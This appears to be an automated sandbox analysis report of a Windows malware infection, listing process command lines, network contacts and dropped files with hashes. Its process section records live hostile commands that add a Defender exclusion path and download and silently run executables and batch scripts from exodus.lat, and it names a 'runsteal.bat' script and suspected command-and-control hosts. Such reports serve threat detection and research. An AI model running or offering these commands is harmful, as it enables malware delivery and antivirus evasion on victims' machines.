"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1612.5.183674601\540193876" -childID 4 -isForBrowser -prefsHandle 3928 -prefMapHandle 3932 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2998d834-c7c5-4eab-a484-abd784c9c9a3} 1612 "\\.\pipe\gecko-crash-server-pipe.1612" 3916 1ed70d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1612.6.789141583\1208129043" -childID 5 -isForBrowser -prefsHandle 4132 -prefMapHandle 4136 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b72ac4e8-e445-46ba-9964-3e4f809897bf} 1612 "\\.\pipe\gecko-crash-server-pipe.1612" 4120 20e2b858 tab

C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe

"C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe"

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\tasklist.exe

tasklist /fi "imagename eq mi.exe"

C:\Windows\SysWOW64\find.exe

find /i "mi.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
US 8.8.8.8:53 UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY udp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 104.21.88.210:443 dwell-exclaim.biz tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 formy-spill.biz udp
US 104.21.96.55:443 formy-spill.biz tcp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 dare-curbys.biz udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
GB 216.58.213.14:443 youtube.com tcp
US 172.67.181.44:443 dare-curbys.biz tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
N/A 127.0.0.1:49738 tcp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.178.14:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.178.14:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 print-vexer.biz udp
US 104.21.35.246:443 print-vexer.biz tcp
N/A 127.0.0.1:49746 tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 104.21.82.174:443 marshal-zhukov.com tcp
NL 92.63.197.221:80 92.63.197.221 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-4g5edn6k.gvt1.com udp
DE 74.125.111.136:443 r3---sn-4g5edn6k.gvt1.com tcp
US 8.8.8.8:53 r3.sn-4g5edn6k.gvt1.com udp
US 8.8.8.8:53 r3.sn-4g5edn6k.gvt1.com udp
DE 74.125.111.136:443 r3.sn-4g5edn6k.gvt1.com udp
GB 45.74.38.211:4782 tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.14:443 consent.youtube.com udp
RU 188.119.66.185:443 188.119.66.185 tcp

Files

memory/2788-0-0x0000000000180000-0x000000000065C000-memory.dmp

memory/2788-1-0x0000000077900000-0x0000000077902000-memory.dmp

memory/2788-2-0x0000000000181000-0x00000000001AF000-memory.dmp

memory/2788-3-0x0000000000180000-0x000000000065C000-memory.dmp

memory/2788-4-0x0000000000180000-0x000000000065C000-memory.dmp

\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 6d17158239deaa10445332a320d93bb4
SHA1 d7928e790267e50aa28a8f734329ea302f8176bb
SHA256 547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf
SHA512 c002e6913b1a5674d00e9077af4fada039b06f290114c47d3cd58b5ababc713bf9ba84defcf791e1dd51f93662e940baee376214b24c01fcdca0fd867bde55ff

memory/2892-21-0x0000000001330000-0x000000000180C000-memory.dmp

memory/2788-20-0x00000000072B0000-0x000000000778C000-memory.dmp

memory/2788-18-0x00000000072B0000-0x000000000778C000-memory.dmp

memory/2788-17-0x0000000000180000-0x000000000065C000-memory.dmp

memory/2892-22-0x0000000001331000-0x000000000135F000-memory.dmp

memory/2892-23-0x0000000001330000-0x000000000180C000-memory.dmp

memory/2892-25-0x0000000001330000-0x000000000180C000-memory.dmp

memory/2892-26-0x0000000001330000-0x000000000180C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

MD5 3a16d0e4e4522073da3c8a5a9f9e790b
SHA1 7a42a21a348d2e49c67b426d333a5c354ed2c83e
SHA256 ccc4dd64df98c26da462a17a8df9f927d02e202d88ada8cfba92b7bbeb954c3e
SHA512 1213c3e077b660afa65133f0b5943bd866f02d736284791dc99ae4d30c6ed7705eb55999cb4a3be1cc0a394111904154bc72a2d0f1fdc453893ecf9a4a25b99a

memory/1492-40-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp

MD5 e672d5907f1ce471d9784df64d8a306b
SHA1 6d094cae150d72b587c5480c15127d7059e16932
SHA256 9f9250be71bd6254790a9630990f4560d53995db3d8737b7f49986e3551283e5
SHA512 9cf10e997d8d99e6eb2f6ccac00ab365f63e03d96c2e2354fdf67683b85553a60cd9542cfb21cbea468c6a2bda454cde71937c0d21c4b738451b5e2c30690c39

\Users\Admin\AppData\Local\Temp\is-9FM8U.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-9FM8U.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

MD5 b466bf1dc60388a22cb73be01ca6bf57
SHA1 21eb9665e42d6c4a8d9e764627049b2a6e3a69a4
SHA256 e5f0f0c3383080fc2702779e3040c490ab022af69a4bc8c61bf9b1f6514ae7ad
SHA512 6cb51dae17b3bcef6254ecf6538ecc49cdd53c40c979fd743f49987b28d05c033781b1047dbf25b203b02bf70ce4205dcc1cc5bbea46119cb0e2cd0ce140cbe2

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/2892-86-0x0000000001330000-0x000000000180C000-memory.dmp

memory/2892-88-0x0000000001330000-0x000000000180C000-memory.dmp

memory/2784-87-0x0000000003C50000-0x0000000003F2F000-memory.dmp

memory/1440-89-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2892-90-0x0000000001330000-0x000000000180C000-memory.dmp

memory/1440-91-0x0000000000400000-0x00000000006DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

memory/1492-104-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2784-105-0x0000000000400000-0x00000000004BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Audit

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

memory/1440-206-0x0000000060900000-0x0000000060992000-memory.dmp

memory/1440-204-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/1440-219-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2892-199-0x0000000001330000-0x000000000180C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe

MD5 d124690a731b9f9511d39dda3a5ef3d8
SHA1 26fc68f194903e93db04711c9524c442845b583c
SHA256 47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775
SHA512 e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634

memory/2892-489-0x00000000069F0000-0x0000000006E7C000-memory.dmp

memory/2348-491-0x0000000000040000-0x00000000004CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe

MD5 343a771efad9c921a3abb8d4201f6040
SHA1 b142b17a0dfb82b75071950eba743d0150ad12ff
SHA256 6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e
SHA512 d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2

memory/2892-511-0x00000000069F0000-0x0000000006EEF000-memory.dmp

memory/2892-513-0x00000000069F0000-0x0000000006E7C000-memory.dmp

memory/2944-514-0x0000000000D60000-0x000000000125F000-memory.dmp

memory/2892-510-0x00000000069F0000-0x0000000006EEF000-memory.dmp

memory/2892-515-0x0000000001330000-0x000000000180C000-memory.dmp

memory/1440-516-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2348-518-0x0000000000040000-0x00000000004CC000-memory.dmp

memory/2944-520-0x0000000000D60000-0x000000000125F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe

MD5 8746d7ddcd593e7a9a38016b27a6dde0
SHA1 a505737a7bebefbd81d28d729e26187d15ea3aa7
SHA256 159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280
SHA512 9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52

memory/2348-535-0x0000000000040000-0x00000000004CC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

MD5 47daf1c10de1d42a6c45466984bc707f
SHA1 9130f171c4e48c384d9974003a9c07df9f17d09a
SHA256 b9fa0c30ec999e7b6a6ea5eae805d04a64aca351c1f97632b8e470fc321067ec
SHA512 bf61d6d23288d1b4eda4f1a2b960055caadcbc5936ffdb8cf15831a4a08adff1eb8b57eb89512160a6d03b923816622aeec884b5c50e85342ab571909285bd46

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\88ad0b38-9273-4626-a2e5-f39ca552a87d

MD5 c74e3ddcdd0c43fb2e06cc19125e2665
SHA1 486d1bbd3d4dfc47eee2c35a1fbaaef6c9737642
SHA256 40e09239ab2021b0b54fbbac9d64f754bf00f354295e58a9966028a477022da2
SHA512 bfbae22fe59365849ac9b48e6b91076fef6c1e03fe383ed19aed465d4ae8c431c9605b23edeb2999379a4c03d68a05f75182a4baa61be1cd9f54ccfd9dd5e688

C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe

MD5 fc6804a55358a117689dab9333fd0ee5
SHA1 bbe4309bc6d99a67ecc0e866907889659d8e7031
SHA256 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58
SHA512 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

MD5 214f3b2129393230ad94e0e64285ad8b
SHA1 087ac4770bcecf9cccfea9d5fd2a1a242742edd5
SHA256 cfd3322a2692e3ed2e689a8801af921fdab57c0c5c74f900b83b324fa0f86651
SHA512 9738cf1cb3c4394e95287c41eeca60878509ab63e4b4458d0f0cac81a99c21e6eb7d72a31e9095f3d5121183776dc4520391d568fd266387b7331ffbe6268fba

memory/2892-630-0x00000000069F0000-0x0000000006C98000-memory.dmp

memory/2892-628-0x00000000069F0000-0x0000000006EEF000-memory.dmp

memory/1312-640-0x00000000008B0000-0x0000000000B58000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 ee3233f1fe94362f29e36d1523734b87
SHA1 be43026753ff3510fd8022bc35fa73378cc4d8f5
SHA256 1f683329fd2ed35ccf8f07e72b1e98d7aeb8dde93956d64242aa65a42b880b74
SHA512 ba086af7ee2bf81716ed04593ce59b7b98db2a1e3f1f9d55197fa1ca8d48b28175dcf8d364b65e577938f28c1cb5fad5f830e41d0ddd0b5f580b9a758012670f

memory/1312-678-0x00000000008B0000-0x0000000000B58000-memory.dmp

memory/1312-681-0x00000000008B0000-0x0000000000B58000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 beeb67b95854654b0067d7dd9b5f5365
SHA1 f5050cd4e33a02ff83c7796ef7dc0ef0cde4a96a
SHA256 85e3ea08ff2e98df2195d81496633eae533dc547fce66bf990a0f5405be35bdd
SHA512 a9e72a2b86a1c7e419b1f0eac77d4bb92c71a3e84fe2be9dbda674e50b5bc99ca54e3b9485a9672bf2fbc63825e9639ef4b7b08de7a38be7b1ad7df6a1b6c90a

memory/1440-706-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2892-705-0x0000000001330000-0x000000000180C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab2E24.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar2E37.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/2892-761-0x00000000069F0000-0x0000000007252000-memory.dmp

memory/3788-762-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2892-763-0x00000000069F0000-0x0000000007252000-memory.dmp

memory/2348-764-0x0000000000040000-0x00000000004CC000-memory.dmp

memory/2892-768-0x00000000069F0000-0x0000000006C98000-memory.dmp

memory/1312-771-0x00000000008B0000-0x0000000000B58000-memory.dmp

memory/2892-785-0x00000000069F0000-0x0000000007252000-memory.dmp

memory/1312-787-0x00000000008B0000-0x0000000000B58000-memory.dmp

memory/3788-791-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/1440-789-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2892-788-0x0000000001330000-0x000000000180C000-memory.dmp

memory/2892-793-0x00000000069F0000-0x0000000007252000-memory.dmp

memory/3788-792-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

MD5 1483498a801931011f59375c19fc4a2b
SHA1 8b5f5cbf39c26f2775678db8db3ed928b8ac1df4
SHA256 76e0fdd1cf50580203911e20cb8a1e1736b5ec8903fb81e15618032541f36664
SHA512 bfebcdc7ba8b870b05ddff9d4e9afd189bff35e29b672c872425f521bee36e5aaa7b141243bd878ddc9c5325fed46bf185b4a5d5b60b7defdba11e79f07ebe73

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
